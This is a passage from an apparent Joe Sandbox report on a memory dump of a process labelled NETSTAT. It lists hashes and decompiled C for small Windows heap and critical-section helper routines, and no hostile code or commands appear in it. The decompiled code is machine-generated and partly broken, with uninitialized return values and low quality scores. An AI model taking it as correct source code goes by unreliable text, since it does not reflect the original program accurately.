                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                • Instruction ID: 62adecff602d47e97db4322082b4c19e1dbc6eb258184d84b7c15ad8cd0b3169
                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                • Instruction Fuzzy Hash: CBD0A93D8033809EDB03FB10C698768B3B6BB00A28F5C24A980020AB52C33A4A0ED700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0335DB40() {
                				signed int* _t3;
                				void* _t5;
                
                				_t3 = L03374620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                				if(_t3 == 0) {
                					return 0;
                				} else {
                					 *_t3 =  *_t3 | 0x00000400;
                					return _t3;
                				}
                			}





                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                • Instruction ID: e56a4ad7082ffb49d6da6c01d032643f70ec44142f65b70ffd780fcd7b3724d8
                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                • Instruction Fuzzy Hash: 21C08C30280B00AAEB32AF20CD41F0076A1BB00B01F4800A07700DA0F0EB7CE801E600
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E033DA537(intOrPtr _a4, intOrPtr _a8) {
                
                				return L03378E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                			}



                0x033da553

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                • Instruction ID: 25c4d5f69b5b796af5ffe593466d0d497563fd3edaef2d3393ae0140e4496631
                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                • Instruction Fuzzy Hash: 1EC08C37080248BBCB22AF81CC01F06BF2AFB94B60F108010FA080F970C636E970EB84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E03373A1C(intOrPtr _a4) {
                				void* _t5;
                
                				return L03374620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                			}




                0x03373a35

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                • Instruction ID: fb6092407f8fa7ccbefdd45358f25ca25d384652df343ec28da600c79821e739
                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                • Instruction Fuzzy Hash: 6EC04C36180648BBC722AE46DD41F157B69E794B60F154021B6040A561857AED61D598
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E033676E2(void* __ecx) {
                				void* _t5;
                
                				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                					return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                				}
                				return _t5;
                			}




                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                • Instruction ID: d6f2bca8b37318210244952036454c9d83d1120ce58ba457bfb086e6cd6a04be
                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                • Instruction Fuzzy Hash: FFC08C741412C09EEB2AD708CEA0B303655AB0860DFAC019CBA010D4A1C36CA803C208
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E033836CC(void* __ecx) {
                
                				if(__ecx > 0x7fffffff) {
                					return 0;
                				} else {
                					return L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                				}
                			}



                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                • Instruction ID: 82b7932ff59de98a896f076e4759e7090732f8e4fd5853c0a1cee2cacf04beb3
                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                • Instruction Fuzzy Hash: FFC04C79155540BADA25AF248D91B157254A740A61F6806547221495E0D56DAC00D504
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0335AD30(intOrPtr _a4) {
                
                				return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                			}



                0x0335ad49

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                • Instruction ID: cc0eeb6de7d2a5ee8d51b18faf9c9dbcec524324efe4cce317f6d57cfc701e13
                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                • Instruction Fuzzy Hash: C7C08C32080288BBC722AA45CD40F217B29E790B60F000020B6040A661C936E862D588
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E03377D50() {
                				intOrPtr* _t3;
                
                				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                				if(_t3 != 0) {
                					return  *_t3;
                				} else {
                					return _t3;
                				}
                			}




                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                • Instruction ID: f20eed623ac1a85ee324ba082283834ba5da4d6e8c68d364d3bb8f8ae5b56ec0
                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                • Instruction Fuzzy Hash: CCB092343019408FCE26DF18C480B2533E8BB48A80B8800D0E400CBA20D229E8008A00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E03382ACB() {
                				void* _t5;
                
                				return E0336EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                			}




                0x03382adc

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                • Instruction ID: 2b72c543d522a54f009b9af2196a2a96e9651a65036bc9cb9f656fbe724c0bae
                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                • Instruction Fuzzy Hash: DAB01236C11540CFCF02EF40C750B197331FB00750F05849490012BA30C229AC01DB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E033EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                				void* _t7;
                				intOrPtr _t9;
                				intOrPtr _t10;
                				intOrPtr* _t12;
                				intOrPtr* _t13;
                				intOrPtr _t14;
                				intOrPtr* _t15;
                
                				_t13 = __edx;
                				_push(_a4);
                				_t14 =  *[fs:0x18];
                				_t15 = _t12;
                				_t7 = E0339CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                				_push(_t13);
                				E033E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                				_t9 =  *_t15;
                				if(_t9 == 0xffffffff) {
                					_t10 = 0;
                				} else {
                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                				}
                				_push(_t10);
                				_push(_t15);
                				_push( *((intOrPtr*)(_t15 + 0xc)));
                				_push( *((intOrPtr*)(_t14 + 0x24)));
                				return E033E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                			}











                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033EFDFA
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033EFE01
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033EFE2B
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                • API String ID: 885266447-3903918235
                • Opcode ID: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                • Instruction ID: fb9619a674fe901cd7bbc96dabc59636526f6d57f9f21b39f23fee0af9d960cd
                • Opcode Fuzzy Hash: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                • Instruction Fuzzy Hash: 7CF0F676600211BFEA209A45DC82F23BB5AEB85730F154315F6285A5E1DAA2FC3096F0
                Uniqueness

                Uniqueness Score: -1.00%